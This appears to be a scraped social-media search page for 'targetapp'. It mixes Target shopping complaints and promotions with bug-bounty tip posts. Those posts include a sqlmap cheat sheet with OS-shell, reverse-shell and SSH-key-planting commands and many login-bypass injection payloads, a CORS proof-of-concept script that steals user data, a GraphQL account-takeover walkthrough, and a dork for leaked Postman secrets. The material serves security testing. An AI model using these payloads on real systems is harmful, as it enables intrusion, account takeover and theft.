Filter
Exclude
Time range
-
Near
Postman’s "Publish Document" feature defaults to keeping environment variables if they are saved in the active scope.  These get indexed by Google. ✅Try dorking: site:documenter.getpostman.com "targetapp[.]com"

1
1
8
607
20 Dec 2025
#targetapp @Target you should have had a notice on the app. regarding the "disruption to our digital experience." After 10 min....for the chat option (see below) I've now been on hold for 30 mins. #targetappdown
1
538
19 Dec 2025
Not Target quick to charge and take my money but can’t even deliver on the order… the least they can do is return my money #TargetApp #Target
2
490
19 Dec 2025
Anyone else having issues making purchases on the #targetapp #target I’m trying to purchase my nephew’s Xmas gift. It charged me 2x there’s no receipt in app or email and this is super frustrating.
4
8
1,477
Replying to @gayvampires
What fun is there to be had on targetapp
1
2
73
25 Jan 2024
SQL injection using SQLmap Basic arguments for SQLmap ☄️☄️🔥🔥 Load a request file and use mobile user-agent sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 - -risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users -- passwords --current-user --dbs sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1 Custom injection in UserAgent/Header/Referer/Cookie python sqlmap.py -u "example.com" --data "username=admin&password=pass" -- headers="x-forwarded-for:127.0.0.1*" The injection is located at the '*' Second order injection Shell python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs SQL Shell python sqlmap.py -u "example.com/?id=1" -p id --sql-shell Simple Shell python sqlmap.py -u "example.com/?id=1" -p id --os-shell Dropping a reverse-shell / meterpreter python sqlmap.py -u "example.com/?id=1" -p id --os-pwn SSH Shell by dropping an SSH key python sqlmap.py -u "example.com/?id=1" -p id --file- write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/ Crawl a website with SQLmap and auto-exploit sqlmap -u "example.com/" --crawl=1 --random-agent --batch --forms -- threads=5 --level=5 --risk=3 --batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers --crawl = how deep you want to crawl a site --forms = Parse and test forms Using TOR with SQLmap sqlmap -u "target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check- tor --level=5 --risk=3 --threads=5 Using a proxy with SQLmap sqlmap -u "target.com" --proxy="http://127.0.0.1:8080" Using Chrome cookie and a Proxy sqlmap -u "test.com/index.php?id=99" --load- cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080" -f -- time-sec 15 --level 3 SQLmap without SQL injection You can use SQLmap to access a database via its port instead of a URL. sqlmap.py -d "mysql://user:pass@ip/database" --dump-all Using suffix to tamper the injection General tamper option and tamper's list python sqlmap.py -u "example.com/?id=1" -p id --suffix="-- " tamper=name_of_the_tamper Authentication bypass '-' '' '&' '^' '*' ' or 1=1 limit 1 -- - '="or' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' '-||0' "-||0" "-" "" "&" "^" "*" '--' "--" '--' / "--" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x or 2 like 2 or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' -- - admin' # admin'/* admin' or '2' LIKE '1 admin' or 2 LIKE 2-- admin' or 2 LIKE 2# admin') or 2 LIKE 2# admin') or 2 LIKE 2-- admin') or ('2' LIKE '2 admin') or ('2' LIKE '2'# admin') or ('2' LIKE '2'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1' admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1 admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1' admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1' 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin';-- azer admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 #SQL #sqlmap #bugbountytips
5
55
191
10,780
🤔Question of the day: How to Spot CORS Misconfigurations? It is almost year 2024, yet I continue to discover CORS misconfigurations, adding $$$ to my bug bounty earnings each month. Here's my approach to finding CORS Issues: 1️⃣ Nuclei Scan - Identify vulnerable targets with the cors-misconfig.yaml nuclei template using the command nuclei -u http://target -t cors-misconfig.yaml. You can find the template at github.com/projectdiscovery/… 2️⃣ Manual Approach - If you're manually hunting on a target app and believe that specific GET/POST/PATCH/PUT/DELETE endpoints were missed by nuclei, add an Origin header to your requests with null or your attacker site. Check the response headers for Access-Control-Allow-Origin: <your_arbitrary_origin> or <null> and Access-Control-Allow-Credentials: true. 3️⃣ Craft your POC - To ensure your report doesn't get closed as "Informative" or "NA," provide a working PoC. Here's JavaScript code I host on my attacker-controlled server to demonstrate CORS misconfiguration on a sensitive endpoint: var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { alert(xhr.responseText); } } xhr.open('GET', 'http://targetapp/api/v1/user', true); xhr.withCredentials = true; xhr.send(null); Takeaways: Always include CORS misconfig-specific checks in your bug hunting checklist. Many target apps are still vulnerable to these Issues, which can lead to a high severity payout. #BugBounty #WebSecurity #InfoSec #CORSMisconfigurations #HackerOne #BugCrowd #BugBountyTips
33
258
950
91,008
🕵️‍♂️ Show & Tell: Here's how I exploited a simple Issue on target app using GraphQL that allowed me to take over any user's account 💰💰 This is a classic case of thinking outside the "box." The app I targeted allowed Inviting users to your organization. When an invite is sent to the victim, they get a link like http://targetapp/invitation/{token}. What was interesting was that the invitation link automatically logged a victim into their account and asked them if they wanted to accept the invitation. 🚨 This grabbed my attention, prompting the question, "Can I somehow acquire that Invitation token?" Considering its potential to let me take over any person's account, I immediately delved deeper into the app and came across a GraphQL operation for retrieving the list of invited users: code[{"operationName":"GetPendingMembers","variables":{"ID":"XXXX"},"query":"query GetPendingMembers($ID: ID!) {\n users: GetPendingMembers(ID: $ID) {\n invited { email\n role\n createdAt\n updatedAt\n __typename\n }\n __typename\n }\n}\n"}] Looking at this, I thought, "What if the 'invited' object has more info than shown?" So, I added the \n token parameter Inside the invited object: code[{"operationName":"GetPendingMembers","variables":{"ID":"XXXX"},"query":"query GetPendingMembers($ID: ID!) {\n users: GetPendingMembers(ID: $ID) {\n invited {\n token email\n role\n createdAt\n updatedAt\n __typename\n }\n __typename\n }\n}\n"}] Surprisingly, it worked! The GraphQL operation returned the token that was sent to victims email. Crafted a URI with the leaked token, like http://targetapp/invitation/{token}, and took over the victim's account. Lesson: Always think outside the box. Instead of just hunting for vulnerabilities, notice odd app behaviors— they might lead you to unexpected weaknesses. Understand how the app works, find flaws, and outsmart the design. 👾 #BugBounty #AppSecurity #ThinkOutsideTheBox #HackerOne #BugBountyTips #SecurityTips #BugCrowd #InfoSec #Bounties #Bounty #Tips #Follow
10
77
401
31,032
Also TargetApp said they only had 2 in stock and they had at least 6, so make sure you ask! 🥺
Gonna be late for work cause Target restocked 🤣🥳🎉🎊🐥
1
3
20
3,019
10. Target: Target’s AR app allows customers to visualize products in their homes, providing a virtual shopping experience that helps customers make more informed purchasing decisions. #TargetApp #AR
1
2
41
Lots of new stuff on Target website. I know some of you guys like this so thought I would give a heads up! #TheHobby #Retail #TargetApp
1
4
🎯Possible $15 off $50 Purchase at Target! (Check your TargetApp) Go Here: fsf.rocks/3vH2S7Z
1
2
I LOVE @Target drive up service. It saves me hella time & money! Cause you know if I’m walking around Ima spend a couple hundred EASY. #Target #DriveUp #TargetApp
2
Shout out to @Target, they may have lost both items from my online order but at least they refunded me & gave me $10 worth of credits towards my next order. #CustomerService #TargetApp
1
Find the Circle offer in the @Target App and save up to 15% on RITZ CHEESE CRISPERS and Snacks through 8/15/20! 🎯 circle.target.com/o/ritz-che… #mackid #sponsored #RITZJustGotCheesy #target #targetapp @Ritzcrackers
2
3
Shoutout to @Target for already having a 🚲 pickup option on the #TargetApp. @BikeHouston
2
3
My husband attempting to get a discount on an avocado #cheap #targetapp
2
@NECA_TOYS FINALLY, HOLY SHIT!!! I was quicker than the scalpers!! #targetapp #redcard
1
Hey @Target, Theresa at Frisco North is a gem. Her customer service is 5 Star worthy! Thanks for showing me how to use the Target app and saving me some cash. #Target #Targetapp #5Star #customersatisfication
7
Gabe has been AMAZING today talking about the #Target app and helping our guests to utilize #cartwheel and #wallet! You’re 👏🏻the 👏🏻 bomb 👏🏻 Gabe 👏🏻 🎯❤️ #guestobsessed #T0623 #guestfirst #targetapp #FrontEndDreamTeam @KeonTarget @Maddog2898 @Bcan105 @DuaneGriffith10
2
6